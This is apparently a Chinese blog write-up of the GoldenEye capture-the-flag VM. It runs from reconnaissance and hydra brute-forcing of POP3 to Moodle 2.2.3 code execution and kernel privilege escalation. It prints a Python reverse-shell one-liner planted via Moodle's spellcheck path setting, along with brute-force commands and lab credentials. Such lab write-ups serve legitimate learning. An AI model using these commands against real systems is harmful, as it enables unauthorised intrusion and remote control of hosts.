zoukankan      html  css  js  c++  java
  • Goldeneye 靶机过关记录

    注:因记录时间不同,记录中1.111和1.105均为靶机地址。

    1信息收集

    1.1得到目标,相关界面如下:

     

    1.2简单信息收集

    wappalyzer插件显示:

      web服务器:Apache 2.4.7

      OSUbuntu

    Nmap扫描端口:

      Open port 80/25/55006/55007

    1.3查看web页面更多信息

    页面显示添加/sev-home/访问,于是访问http://172.16.1.111/sev-home/如下

     

    没有用用户名密码,且页面无更多信息,尝试查看源码

    发现terminal.js文件

      

    点击查看

     

      

     js文件中涉及信息如下:

      人名:BorisNatalya

      编码:

        

    html实体编码,解码后为InvincibleHack3r

    尝试使用已知两个用户名和解码后的信息登陆,发现登陆失败。Boris小写后成功登陆 

    登陆后的页面信息提示:

      “pop3服务配置为在一个非常高的非默认端口上运行”

    结合最初nmap扫描的信息,可能为5500655007

    识别端口:

      Nmap识别:Nmap -Pn -p your-port -sV your-IP,显示pop3端口为55007

      我是偶然加端口访问,看到相关端口信息

     

    爆破POP3

    利用已知用户名,使用工具进行爆破。这里使用hydra

    root@kali:~# hydra -l natalya -P 6000dict.txt 172.16.1.105 -f -s 55007 pop3

     

    root@kali:~# hydra -l boris -P 6000dict.txt 172.16.1.105 -f -s 55007 pop3

     

      PS:hydra用法:

      hydra -l muts -P pass.txt my.pop3.mail pop3

        -l 指定用户名

        -L 指定用户名字典

        -p 指定密码破解

        -P 指定密码字典

        -f 破解一个就停止

        -s 指定端口

    截止目前,爆破得到的信息如下

      N:boris  P:secert1!

      N:natalya  P:bird

    nc查看账户

    boris账户登录:

     

     (不知道什么原因,其他人能正常登录,我的不行。好在账户的三封邮件信息无关)

     natalya账户登录:

     

    查看第一封邮件

     

    (好像没有有价值信息)

    查看第二封邮件

     

    从邮件进一步得到信息:

      username: xenia

      password: RCP90rulez!

      Domain: severnaya-station.com/gnocertdir

    并指出需要host文件 severnaya-station.com in /etc/hosts.

    按照套路,使用得到的用户名和密码登录邮箱,显示失败。转向web界面尝试。

    修改本机host文件

    Win10下位置(没有则新建):/windows/system32/drivers/etc

     修改内容:172.16.1.105   severnaya-station.com

    访问severnaya-station.com/gnocertdir

     

    登录

    到此,正式登录系统

    2 漏洞发现

    登陆系统,例行查看信息

     发现cms类型,js库版本,编程语言等更多信息。

    随处点击查看,发现 

    猜想CMSmoodle,版本为2.2.3

    百度搜索该CMS漏洞,发现有rce漏洞。msf搜索,发现exp

     

    在所有必要信息中,缺少用户名和密码。先放一放,继续查看

     

    登录后,打开看到未读邮件,发现用户doak

     

     

    继续使用工具对doak账户进行爆破

     

      

      USER doak

      PASS goat

     

    登录doak邮箱,查看邮件

     

    得到

      账号 dr_doak  

      密码 4England!  

    (邮箱尝试,不存在该用户)网页登录,发现如下内容

     

    点击文档下载查看

     

      

    提到图片 /dir007key/for-007.jpg

    查看http://severnaya-station.com/dir007key/for-007.jpg

    网上看Linux下使用strings工具多图片进行分析

     

    不会用,没有找到有用信息

    使用exiftool,查看

     

    或者查看图片信息

     

    发现信息:eFdpbnRlcjE5OTV4IQ==

    使用小葵解密,为xWinter1995x!

     

    继续查看,发现如下。猜测admin为管理员账户

     

     使用admin账户 xWinter1995x!密码登录

     

     

    页面信息印证CMS版本猜想

      

    至此,得到使用该CMS漏洞exp的所有信息

    3漏洞利用

    使用Msfexp

     

      

    运行失败

     

    shell方法2

    百度搜索,找到另一种方法

    1、在Home >Site administration >Server >System paths中添加反弹shell的代码

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("本机ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

     

    2、 Home >Site administration>Plugins > Text editors >TinyMCE HTML editor中将Spell engine改为PSpellShell

     

    3、本地nc监听端口

    4Home> My profile >Blogs >Add a new entry随便填点东西,然后点击下图中红框的Toggle spellchecker,之后就获得shell

     

      获取shell之后要做的第一件事是使用Python获取一个tty

    python -c 'import pty; pty.spawn("/bin/bash")'

    4 权限提升

    查看当前服务器版本

     

    kali查找可用提权方式

     

     

    找到kali中的文件,放到本地

     

     Python开启服务

     

     nc中连接,将本机文件上传至靶机(这里改名为444.c

    因靶机中未安装gcc,故用cc编译,需将文件中一处gcc换为cc

    上传>编译>修改权限>执行

     

      到此,拿到root权限

  • 相关阅读:
    (资源搜索类)几个好用的磁力搜索网站
    百度网盘不限速,直接获取直链
    百度网盘偷偷更新,免费也终于不限速了
    ES6新特性之箭头函数与function的区别
    [亲测可用]BCompare文件比较对比工具4.3.4绿色版
    Autofac 动态获取对象静态类获取对象
    Linq to SQL 语法整理(子查询 & in操作 & join )
    小程序监听页面滚动开始和滚动结束
    C# Task.Run 和 Task.Factory.StartNew 区别
    Entity Framework Core必须牢记的三条引用三条命令
  • 原文地址:https://www.cnblogs.com/appear001/p/12033240.html
Copyright © 2011-2022 走看看